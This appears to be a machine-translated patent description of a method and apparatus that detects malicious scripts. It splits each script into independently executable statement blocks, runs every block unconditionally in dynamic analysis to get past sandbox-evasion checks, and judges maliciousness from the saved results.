Disclosure of Invention
The present invention is directed to solving, at least to some extent, one of the technical problems in the related art.
To this end, a first object of the present invention is to propose a method for detecting malicious scripts.
A second object of the present invention is to provide a malicious script detection apparatus.
A third object of the invention is to propose a computer device.
A fourth object of the invention is to propose a non-transitory computer-readable storage medium.
A fifth object of the invention is to propose a computer program product.
In order to achieve the above object, an embodiment of a first aspect of the present invention provides a method for detecting a malicious script, including the following steps: acquiring a script to be tested, and acquiring a plurality of logic blocks of the script to be tested through lexical grammar analysis; dynamically processing each logic block of the plurality of logic blocks, and acquiring a processing result of each logic block; and acquiring a malicious detection result of the script to be detected according to the processing result of each logic block.
The detection method of the malicious script in the embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, and realize effective detection of the malicious script, thereby effectively improving the accuracy and reliability of detection, further enabling a user to avoid being attacked by the malicious script, and improving the use experience of the user.
In addition, the method for detecting a malicious script according to the above embodiment of the present invention may further have the following additional technical features:
further, in an embodiment of the present invention, the obtaining the plurality of logic blocks of the script to be tested through lexical grammar analysis further includes: and taking each independently executed minimum statement unit in the script to be tested as a logic block through lexical grammar analysis so as to obtain the plurality of logic blocks by division.
Further, in an embodiment of the present invention, the method further includes: and saving the processing result of each logic block.
Further, in an embodiment of the present invention, the dynamically processing each of the plurality of logical partitions includes: and calling a dynamic processing interface to sequentially transmit the plurality of logic blocks to perform dynamic processing.
In order to achieve the above object, a second embodiment of the present invention provides a malicious script detection apparatus, including: the system comprises a first acquisition module, a second acquisition module and a third acquisition module, wherein the first acquisition module is used for acquiring a script to be tested and acquiring a plurality of logic blocks of the script to be tested through lexical grammar analysis; the processing module is used for dynamically processing each logic block of the plurality of logic blocks and acquiring the processing result of each logic block; and the second acquisition module is used for acquiring the malicious detection result of the script to be detected according to the processing result of each logic block.
The detection device for the malicious script provided by the embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, and realize effective detection of the malicious script, so that the accuracy and reliability of detection are effectively improved, a user can be prevented from being attacked by the malicious script, and the use experience of the user is improved.
In addition, the detection apparatus for malicious scripts according to the above embodiment of the present invention may further have the following additional technical features:
further, in an embodiment of the present invention, the first obtaining module is further configured to use each separately executed minimum statement unit in the script to be tested as a logic partition through lexical grammar analysis, so as to obtain the plurality of logic partitions through segmentation; the processing module is further used for calling a dynamic processing interface so as to sequentially transmit the plurality of logic blocks to be dynamically processed.
Further, in an embodiment of the present invention, the method further includes: and the storage module is used for storing the processing result of each logic block.
In order to achieve the above object, a third embodiment of the present invention provides a computer device, which includes a memory, a processor, and a computer program stored in the memory and executable on the processor, and when the processor executes the computer program, the processor implements the method for dynamically detecting malicious code according to the above embodiment.
To achieve the above object, a fourth aspect of the present invention provides a non-transitory computer-readable storage medium, on which a computer program is stored, and when the computer program is executed by a processor, the method for dynamically detecting malicious code according to the above embodiment is implemented.
To achieve the above object, a fifth aspect of the present invention provides a computer program product, wherein when the instructions in the computer program product are executed by a processor, the method for dynamically detecting malicious code according to the above embodiments is performed.
Additional aspects and advantages of the invention will be set forth in part in the description which follows and, in part, will be obvious from the description, or may be learned by practice of the invention.
Detailed Description
Reference will now be made in detail to embodiments of the present invention, examples of which are illustrated in the accompanying drawings, wherein like or similar reference numerals refer to the same or similar elements or elements having the same or similar function throughout. The embodiments described below with reference to the drawings are illustrative and intended to be illustrative of the invention and are not to be construed as limiting the invention.
The following describes a method and an apparatus for detecting a malicious script according to an embodiment of the present invention with reference to the drawings, and first, a method for detecting a malicious script according to an embodiment of the present invention will be described with reference to the drawings.
FIG. 1 is a flow chart of a method of detecting malicious scripts according to one embodiment of the present invention.
As shown in fig. 1, the method for detecting malicious scripts includes the following steps:
in step S101, a script to be tested is obtained, and a plurality of logical blocks of the script to be tested are obtained through lexical grammar analysis.
It can be understood that, as shown in fig. 2, in the embodiment of the present invention, a script to be detected is first obtained, and the script to be detected is subjected to static logic partitioning preprocessing in a lexical grammar analysis or other manners.
It should be noted that, in the embodiment of the present invention, the static logic blocking preprocessing is performed on the script to be detected, and the purpose of blocking is to eliminate the influence of all logic judgments and function calls in the script on the following dynamic processing result. That is to say, the static logic block preprocessing can effectively solve the influence of all logic judgment and function call in the script on the next dynamic processing result, thereby improving the acquisition capability and accuracy of the dynamic behavior.
Further, in an embodiment of the present invention, obtaining a plurality of logical partitions of the script to be tested through lexical grammar analysis further includes: and taking each independently executed minimum statement unit in the script to be tested as a logic block through lexical grammar analysis so as to obtain a plurality of logic blocks through segmentation.
It is understood that the blocking method is to use the smallest statement unit that can be executed by each entry in the script individually as a logical block according to the lexical grammar analysis (e.g., divide the statements in if/else into unconditional execution, etc.).
In step S102, dynamic processing is performed on each of the plurality of logical blocks, and a processing result of each logical block is acquired.
It can be understood that, in the embodiment of the present invention, the plurality of logical partitions are sent to the dynamic detection module, and the dynamic detection module performs dynamic processing on the plurality of received logical partitions.
Further, in an embodiment of the present invention, dynamically processing each of the plurality of logical partitions includes: and calling a dynamic processing interface to sequentially transmit the plurality of logic blocks for dynamic processing.
It can be understood that, in the embodiment of the present invention, the dynamic processing interface is invoked to sequentially transfer the divided logical partitions into the dynamic processing, so as to obtain the processing result of each logical partition, and thus when an error occurs in the dynamic processing process of one partition, the dynamic processing of the subsequent module is not affected, and more codes can be executed as much as possible, thereby improving the obtaining capability of the dynamic behavior of the malicious code.
Further, in an embodiment of the present invention, the method of an embodiment of the present invention further includes: the processing result of each logical block is saved.
It is understood that, as shown in fig. 2, the embodiment of the present invention may store the processing result after each block is dynamically processed.
In step S103, a malicious detection result of the script to be detected is obtained according to the processing result of each logic block.
For example, most of malicious scripts to be detected are subjected to measures such as compression, encryption, confusion and the like, and if the detection is performed according to a traditional dynamic detection mode, the malicious behavior of the malicious scripts cannot be really detected when the execution of malicious codes is bypassed by means of anti-sandbox such as time delay and current time judgment. Therefore, the embodiment of the invention adds the static logic block preprocessing function before dynamically processing the script to be detected, so that each sentence which can be independently executed can be executed during dynamic processing, thereby effectively improving the acquisition capability and the accuracy of the dynamic behavior of the malicious code.
Specifically, in one embodiment of the present invention, as shown in fig. 2, the method of the embodiment of the present invention includes the following steps:
step S201 starts.
Step S202, detecting the script.
That is, the script to be tested is acquired, and the process proceeds to step S203.
Step S203, static logic blocking.
Specifically, static logic partitioning preprocessing is performed on the script to be detected through lexical and grammatical analysis and the like, so that influence of all logic judgment and function calling in the script on a next dynamic processing result is eliminated.
In the embodiment of the invention, the static logic block preprocessing function is added, so that each statement which can be executed independently can be executed during dynamic processing, and the acquisition capability and the accuracy of the dynamic behavior of the malicious code can be effectively improved.
And step S204, dynamic processing.
After the static logic blocks are preprocessed, the divided logic blocks are sequentially transmitted to be dynamically processed, so that the processing result of each logic block is obtained, the dynamic processing of a subsequent module is prevented from being influenced when one block has an error in the dynamic processing process, more codes are effectively executed, and the acquisition capacity of the dynamic behavior of malicious codes is improved.
In step S205, the result of each block processing is saved.
And step S206, obtaining a malicious detection result according to each block processing result.
In short, if the detection is performed according to the dynamic detection method of the related art, if the execution of the malicious code is bypassed by the anti-sandbox methods such as delaying and judging the current time, the malicious behavior of the malicious script cannot be really detected, however, in the embodiment of the present invention, a static logic block preprocessing function is added before dynamically processing the script to be detected, so that each statement that can be executed independently can be executed during dynamic processing, and the dynamic processing interface is invoked to sequentially transfer the divided logic blocks into the dynamic processing, thereby obtaining the processing result of each logic block.
And step S207, ending.
The embodiment of the invention can enable the malicious code to be unconditionally executed in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, realize effective detection of the malicious script, further effectively detect the real malicious behavior of the malicious script and avoid being attacked by the malicious script.
According to the detection method of the malicious script provided by the embodiment of the invention, the logic block preprocessing function is added on the static detection method and the dynamic processing is combined, so that the malicious code can be executed unconditionally in the dynamic detection, the real malicious behavior of the malicious script can be rapidly and accurately detected, and the effective detection of the malicious script is realized, thereby effectively improving the acquisition capability of the dynamic behavior of the malicious code, effectively improving the accuracy and reliability of the detection, further preventing a user from being attacked by the malicious script, and improving the use experience of the user.
Next, a detection apparatus of a malicious script proposed according to an embodiment of the present invention is described with reference to the drawings.
Fig. 3 is a schematic structural diagram of a malicious script detection apparatus according to an embodiment of the present invention.
As shown in fig. 3, the malicious script detection apparatus 10 includes: a first acquisition module 100, a processing module 200 and a second acquisition module 300.
The first obtaining module 100 is configured to obtain a script to be tested, and obtain a plurality of logic blocks of the script to be tested through lexical syntax analysis. The processing module 200 is configured to perform dynamic processing on each of the plurality of logical partitions, and obtain a processing result of each logical partition. The second obtaining module 300 is configured to obtain a malicious detection result of the script to be detected according to the processing result of each logic block. The device 10 of the embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, and realize effective detection of the malicious script, thereby effectively improving the accuracy and reliability of detection, further enabling a user to avoid being attacked by the malicious script, and improving the use experience of the user.
Further, in an embodiment of the present invention, the first obtaining module 100 is further configured to use each separately executed minimum statement unit in the script to be tested as a logic partition through lexical grammar analysis, so as to obtain a plurality of logic partitions through segmentation; the processing module is further used for calling the dynamic processing interface so as to sequentially transmit the plurality of logic blocks to be dynamically processed.
Further, in one embodiment of the present invention, the apparatus 10 of the embodiment of the present invention further comprises: and a storage module. The storage module is used for storing the processing result of each logic block.
It should be noted that the explanation of the foregoing embodiment of the method for detecting a malicious script is also applicable to the apparatus for detecting a malicious script of this embodiment, and details are not described here again.
According to the detection device for the malicious script, which is provided by the embodiment of the invention, the logic block preprocessing function is added on the static detection method and the dynamic processing is combined, so that the malicious code can be executed unconditionally in the dynamic detection, the true malicious behavior of the malicious script can be rapidly and accurately detected, and the effective detection of the malicious script is realized, thereby effectively improving the acquisition capability of the dynamic behavior of the malicious code, effectively improving the accuracy and reliability of the detection, further preventing a user from being attacked by the malicious script, and improving the use experience of the user.
In addition, an embodiment of the present invention further provides a computer device, which includes a memory, a processor, and a computer program that is stored in the memory and can be run on the processor, and when the processor executes the program, the method for dynamically detecting malicious codes according to the above embodiment is implemented.
Furthermore, an embodiment of the present invention further provides a non-transitory computer-readable storage medium, on which a computer program is stored, where the computer program, when executed by a processor, implements the method for dynamically detecting malicious code according to the above embodiment.
Furthermore, the first embodiment of the present invention further provides a computer program product, wherein when instructions in the computer program product are executed by a processor, the method for dynamically detecting malicious code according to the above embodiments is performed.
Furthermore, the terms "first", "second" and "first" are used for descriptive purposes only and are not to be construed as indicating or implying relative importance or implicitly indicating the number of technical features indicated. Thus, a feature defined as "first" or "second" may explicitly or implicitly include at least one such feature. In the description of the present invention, "a plurality" means at least two, e.g., two, three, etc., unless specifically limited otherwise.
In the description herein, references to the description of the term "one embodiment," "some embodiments," "an example," "a specific example," or "some examples," etc., mean that a particular feature, structure, material, or characteristic described in connection with the embodiment or example is included in at least one embodiment or example of the invention. In this specification, the schematic representations of the terms used above are not necessarily intended to refer to the same embodiment or example. Furthermore, the particular features, structures, materials, or characteristics described may be combined in any suitable manner in any one or more embodiments or examples. Furthermore, various embodiments or examples and features of different embodiments or examples described in this specification can be combined and combined by one skilled in the art without contradiction.
Although embodiments of the present invention have been shown and described above, it is understood that the above embodiments are exemplary and should not be construed as limiting the present invention, and that variations, modifications, substitutions and alterations can be made to the above embodiments by those of ordinary skill in the art within the scope of the present invention.